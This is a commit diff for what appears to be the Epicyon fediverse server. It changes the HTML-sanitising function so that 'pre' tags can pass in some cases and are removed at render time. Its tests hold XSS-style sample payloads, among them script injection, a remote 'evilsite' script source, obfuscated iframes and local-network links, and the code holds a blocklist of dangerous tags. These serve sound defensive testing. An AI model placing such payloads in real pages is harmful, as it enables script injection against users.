Allow pre tag through dangerous markup filter in some cases, then remove it when rendering

2023-05-18 12:15:18 +01:00 · 2023-05-18 12:15:18 +01:00 · 4caa930f67
parent 8efb5bedd4
commit 4caa930f67
11 changed files with 115 additions and 38 deletions
--- a/content.py
+++ b/content.py
@ -267,7 +267,7 @@ def dangerous_css(filename: str, allow_local_network_access: bool) -> bool:

    # an attacker can include html inside of the css
    # file as a comment and this may then be run from the html
-    if dangerous_markup(content, allow_local_network_access):
+    if dangerous_markup(content, allow_local_network_access, []):
        return True
    return False

--- a/daemon.py
+++ b/daemon.py
@ -5544,7 +5544,7 @@ class PubServer(BaseHTTPRequestHandler):
                if fields.get('editedAbout'):
                    about_str = fields['editedAbout']
                    if not dangerous_markup(about_str,
-                                            allow_local_network_access):
+                                            allow_local_network_access, []):
                        try:
                            with open(about_filename, 'w+',
                                      encoding='utf-8') as aboutfile:
@ -5563,7 +5563,7 @@ class PubServer(BaseHTTPRequestHandler):
                if fields.get('editedTOS'):
                    tos_str = fields['editedTOS']
                    if not dangerous_markup(tos_str,
-                                            allow_local_network_access):
+                                            allow_local_network_access, []):
                        try:
                            with open(tos_filename, 'w+',
                                      encoding='utf-8') as tosfile:
--- a/inbox.py
+++ b/inbox.py
@ -1360,7 +1360,7 @@ def _valid_post_content(base_dir: str, nickname: str, domain: str,
        if summary != valid_content_warning(summary):
            print('WARN: invalid content warning ' + summary)
            return False
-        if dangerous_markup(summary, allow_local_network_access):
+        if dangerous_markup(summary, allow_local_network_access, []):
            if message_json['object'].get('id'):
                print('REJECT ARBITRARY HTML: ' + message_json['object']['id'])
            print('REJECT ARBITRARY HTML: bad string in summary - ' +
@ -1384,7 +1384,7 @@ def _valid_post_content(base_dir: str, nickname: str, domain: str,
            return False

    content_str = get_base_content_from_post(message_json, system_language)
-    if dangerous_markup(content_str, allow_local_network_access):
+    if dangerous_markup(content_str, allow_local_network_access, ['pre']):
        if message_json['object'].get('id'):
            print('REJECT ARBITRARY HTML: ' + message_json['object']['id'])
        if debug:
--- a/newsdaemon.py
+++ b/newsdaemon.py
@ -601,8 +601,8 @@ def _convert_rss_to_activitypub(base_dir: str, http_prefix: str,

        rss_title = _remove_control_characters(item[0])
        url = item[1]
-        if dangerous_markup(url, allow_local_network_access) or \
-           dangerous_markup(rss_title, allow_local_network_access):
+        if dangerous_markup(url, allow_local_network_access, []) or \
+           dangerous_markup(rss_title, allow_local_network_access, []):
            continue
        rss_description = ''

--- a/outbox.py
+++ b/outbox.py
@ -303,7 +303,7 @@ def post_message_to_outbox(session, translate: {},
                                system_language, translate,
                                'nowplaying', 'NowPlaying')

-            if dangerous_markup(content_str, allow_local_network_access):
+            if dangerous_markup(content_str, allow_local_network_access, []):
                print('POST to outbox contains dangerous markup: ' +
                      str(message_json))
                return False
--- a/posts.py
+++ b/posts.py
@ -413,7 +413,7 @@ def get_person_box(signing_priv_key_pem: str, origin_domain: str,
    display_name = None
    if person_json.get('name'):
        display_name = person_json['name']
-        if dangerous_markup(person_json['name'], False):
+        if dangerous_markup(person_json['name'], False, []):
            display_name = '*ADVERSARY*'
        elif is_filtered(base_dir,
                         nickname, domain,
@ -5549,7 +5549,7 @@ def download_announce(session, base_dir: str, http_prefix: str,
            if announced_json['contentMap'].get(system_language):
                content_str = announced_json['contentMap'][system_language]
                using_content_map = True
-        if dangerous_markup(content_str, allow_local_network_access):
+        if dangerous_markup(content_str, allow_local_network_access, []):
            print('WARN: announced post contains dangerous markup ' +
                  str(announced_json))
            _reject_announce(announce_filename,
--- a/question.py
+++ b/question.py
@ -229,6 +229,7 @@ def dangerous_question(question_json: {},
        question_options = question_json['object']['oneOf']
    for option in question_options:
        if option.get('name'):
-            if dangerous_markup(option['name'], allow_local_network_access):
+            if dangerous_markup(option['name'],
+                                allow_local_network_access, []):
                return True
    return False
--- a/tests.py
+++ b/tests.py
@ -55,6 +55,7 @@ from follow import clear_followers
 from follow import send_follow_request_via_server
 from follow import send_unfollow_request_via_server
 from siteactive import site_is_active
+from utils import remove_markup_tag
 from utils import remove_style_within_html
 from utils import html_tag_has_closing
 from utils import remove_inverted_text
@ -4189,75 +4190,75 @@ def _test_danger_markup():
    print('test_dangerous_markup')
    allow_local_network_access = False
    content = '<p>This is a valid message</p>'
-    assert not dangerous_markup(content, allow_local_network_access)
+    assert not dangerous_markup(content, allow_local_network_access, [])

    content = 'This is a valid message without markup'
-    assert not dangerous_markup(content, allow_local_network_access)
+    assert not dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This is a valid-looking message. But wait... ' + \
        '<script>document.getElementById("concentrated")' + \
        '.innerHTML = "evil";</script></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This is a valid-looking message. But wait... ' + \
        '&lt;script&gt;document.getElementById("concentrated")' + \
        '.innerHTML = "evil";&lt;/script&gt;</p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This html contains more than you expected... ' + \
        '<script language="javascript">document.getElementById("abc")' + \
        '.innerHTML = "def";</script></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This html contains more than you expected... ' + \
        '<?php $server_output = curl_exec($ch); ?></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This is a valid-looking message. But wait... ' + \
        '<script src="https://evilsite/payload.js" /></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This is a valid-looking message. But it contains ' + \
        'spyware. <amp-analytics type="gtag" ' + \
        'data-credentials="include"></amp-analytics></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This is a valid-looking message. But it contains ' + \
        '<a href="something.googleapis.com/anotherthing">spyware.</a></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This message embeds an evil frame.' + \
        '<iframe src="somesite"></iframe></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This message tries to obfuscate an evil frame.' + \
        '<  iframe     src = "somesite"></    iframe  ></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This message is not necessarily evil, but annoying.' + \
        '<hr><br><br><br><br><br><br><br><hr><hr></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This message contans a ' + \
        '<a href="https://validsite/index.html">valid link.</a></p>'
-    assert not dangerous_markup(content, allow_local_network_access)
+    assert not dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This message contans a ' + \
        '<a href="https://validsite/iframe.html">' + \
        'valid link having invalid but harmless name.</a></p>'
-    assert not dangerous_markup(content, allow_local_network_access)
+    assert not dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This message which <a href="127.0.0.1:8736">' + \
        'tries to access the local network</a></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This message which <a href="http://192.168.5.10:7235">' + \
        'tries to access the local network</a></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>127.0.0.1 This message which does not access ' + \
        'the local network</a></p>'
-    assert not dangerous_markup(content, allow_local_network_access)
+    assert not dangerous_markup(content, allow_local_network_access, [])


 def _run_html_replace_quote_marks():
@ -7983,6 +7984,35 @@ def _test_featured_tags() -> None:
    assert result == featured_tags


+def _test_remove_tag() -> None:
+    print('remove_tag')
+    test_html = 'This is a test'
+    result = remove_markup_tag(test_html, 'pre')
+    assert result == test_html
+
+    test_html = '<pre>This is a test</pre>'
+    result = remove_markup_tag(test_html, 'pre')
+    if result != 'This is a test':
+        print('expected: This is a test')
+        print('result: ' + result)
+    assert result == 'This is a test'
+
+    test_html = 'Previous <pre>this is a test</pre>'
+    result = remove_markup_tag(test_html, 'pre')
+    if result != 'Previous this is a test':
+        print('expected: Previous this is a test')
+        print('result: ' + result)
+    assert result == 'Previous this is a test'
+
+    test_html = '<pre>This is a test</pre><br>' + \
+        'something<br><pre>again</pre>'
+    result = remove_markup_tag(test_html, 'pre')
+    if result != 'This is a test<br>something<br>again':
+        print('expected: This is a test<br>something<br>again')
+        print('result: ' + result)
+    assert result == 'This is a test<br>something<br>again'
+
+
 def run_all_tests():
    base_dir = os.getcwd()
    print('Running tests...')
@ -8000,6 +8030,7 @@ def run_all_tests():
    _test_checkbox_names()
    _test_thread_functions()
    _test_functions()
+    _test_remove_tag()
    _test_featured_tags()
    _test_xor_hashes()
    _test_convert_markdown()
--- a/utils.py
+++ b/utils.py
@ -192,6 +192,38 @@ def has_object_dict(post_json_object: {}) -> bool:
    return False


+def remove_markup_tag(html: str, tag: str) -> str:
+    """Remove the given tag from the given html markup
+    """
+    if '<' + tag not in html:
+        return html
+
+    section = html.split('<' + tag)
+    result = ''
+    for text in section:
+        if not result:
+            if html.startswith('<' + tag) and '>' in text:
+                result = text.split('>', 1)[1]
+            else:
+                result = text
+            continue
+        result += text.split('>', 1)[1]
+
+    html = result
+    section = html.split('</' + tag)
+    result = ''
+    for text in section:
+        if not result:
+            if html.startswith('</' + tag) and '>' in text:
+                result = text.split('>', 1)[1]
+            else:
+                result = text
+            continue
+        result += text.split('>', 1)[1]
+
+    return result
+
+
 def get_content_from_post(post_json_object: {}, system_language: str,
                          languages_understood: [],
                          content_type: str = "content") -> str:
@ -213,6 +245,7 @@ def get_content_from_post(post_json_object: {}, system_language: str,
                sys_lang = this_post_json[map_dict][system_language]
                if isinstance(sys_lang, str):
                    content = this_post_json[map_dict][system_language]
+                    content = remove_markup_tag(content, 'pre')
                    return standardize_text(content)
            else:
                # is there a contentMap/summaryMap entry for one of
@ -220,10 +253,12 @@ def get_content_from_post(post_json_object: {}, system_language: str,
                for lang in languages_understood:
                    if this_post_json[map_dict].get(lang):
                        content = this_post_json[map_dict][lang]
+                        content = remove_markup_tag(content, 'pre')
                        return standardize_text(content)
    else:
        if isinstance(this_post_json[content_type], str):
            content = this_post_json[content_type]
+            content = remove_markup_tag(content, 'pre')
    return standardize_text(content)


@ -1182,7 +1217,8 @@ def html_tag_has_closing(tag_name: str, content: str) -> bool:
    return True


-def dangerous_markup(content: str, allow_local_network_access: bool) -> bool:
+def dangerous_markup(content: str, allow_local_network_access: bool,
+                     allow_tags: []) -> bool:
    """Returns true if the given content contains dangerous html markup
    """
    separators = [['<', '>'], ['&lt;', '&gt;']]
@ -1198,8 +1234,11 @@ def dangerous_markup(content: str, allow_local_network_access: bool) -> bool:
    invalid_strings = [
        'script', 'noscript', 'canvas', 'style', 'abbr', 'input',
        'frame', 'iframe', 'html', 'body', 'hr', 'allow-popups',
-        'allow-scripts', 'amp-', '?php'
+        'allow-scripts', 'amp-', '?php', 'pre'
    ]
+    for allowed in allow_tags:
+        if allowed in invalid_strings:
+            invalid_strings.remove(allowed)
    return _is_dangerous_string_tag(content, allow_local_network_access,
                                    separators, invalid_strings)

@ -1236,7 +1275,7 @@ def get_display_name(base_dir: str, actor: str, person_cache: {}) -> str:
                if actor_json.get('name'):
                    name_found = actor_json['name']
    if name_found:
-        if dangerous_markup(name_found, False):
+        if dangerous_markup(name_found, False, []):
            name_found = "*ADVERSARY*"
    return standardize_text(name_found)

@ -4333,19 +4372,25 @@ def harmless_markup(post_json_object: {}) -> None:
    for field_name in ('content', 'summary'):
        if post_json_object['object'].get(field_name):
            if dangerous_markup(post_json_object['object'][field_name],
-                                False):
+                                False, ['pre']):
                post_json_object['object'][field_name] = \
                    remove_html(post_json_object['object'][field_name])
+            post_json_object['object'][field_name] = \
+                remove_markup_tag(post_json_object['object'][field_name],
+                                  'pre')
        map_name = field_name + 'Map'
        if post_json_object['object'].get(map_name):
            map_dict = post_json_object['object'][map_name].items()
            for lang, content in map_dict:
                if not isinstance(content, str):
                    continue
-                if dangerous_markup(content, False):
+                if dangerous_markup(content, False, ['pre']):
                    content = remove_html(content)
                    post_json_object['object'][map_name][lang] = \
                        content
+                content = post_json_object['object'][map_name][lang]
+                post_json_object['object'][map_name][lang] = \
+                    remove_markup_tag(content, 'pre')


 def ap_proxy_type(json_object: {}) -> str:
--- a/webapp_timeline.py
+++ b/webapp_timeline.py
@ -92,7 +92,7 @@ def _get_help_for_timeline(base_dir: str, box_name: str) -> str:
            instance_title = 'Epicyon'
        with open(help_filename, 'r', encoding='utf-8') as help_file:
            help_text = help_file.read()
-            if dangerous_markup(help_text, False):
+            if dangerous_markup(help_text, False, []):
                return ''
            help_text = help_text.replace('INSTANCE', instance_title)
            return '<div class="container">\n' + \
--- a/webapp_utils.py
+++ b/webapp_utils.py
@ -1269,7 +1269,7 @@ def get_post_attachments_as_html(base_dir: str,
            continue
        media_license = ''
        if attach.get('schema:license'):
-            if not dangerous_markup(attach['schema:license'], False):
+            if not dangerous_markup(attach['schema:license'], False, []):
                if not is_filtered(base_dir, nickname, domain,
                                   attach['schema:license'],
                                   system_language):
@ -1279,7 +1279,7 @@ def get_post_attachments_as_html(base_dir: str,
                    else:
                        media_license = attach['schema:license']
        elif attach.get('license'):
-            if not dangerous_markup(attach['license'], False):
+            if not dangerous_markup(attach['license'], False, []):
                if not is_filtered(base_dir, nickname, domain,
                                   attach['license'],
                                   system_language):
@ -1291,7 +1291,7 @@ def get_post_attachments_as_html(base_dir: str,
        media_creator = ''
        if attach.get('schema:creator'):
            if len(attach['schema:creator']) < 120:
-                if not dangerous_markup(attach['schema:creator'], False):
+                if not dangerous_markup(attach['schema:creator'], False, []):
                    if not is_filtered(base_dir, nickname, domain,
                                       attach['schema:creator'],
                                       system_language):
@ -1300,7 +1300,7 @@ def get_post_attachments_as_html(base_dir: str,
            if isinstance(attach['attribution'], list):
                if len(attach['attribution']) > 0:
                    attrib_str = attach['attribution'][0]
-                    if not dangerous_markup(attrib_str, False):
+                    if not dangerous_markup(attrib_str, False, []):
                        if not is_filtered(base_dir, nickname, domain,
                                           attrib_str, system_language):
                            media_creator = attrib_str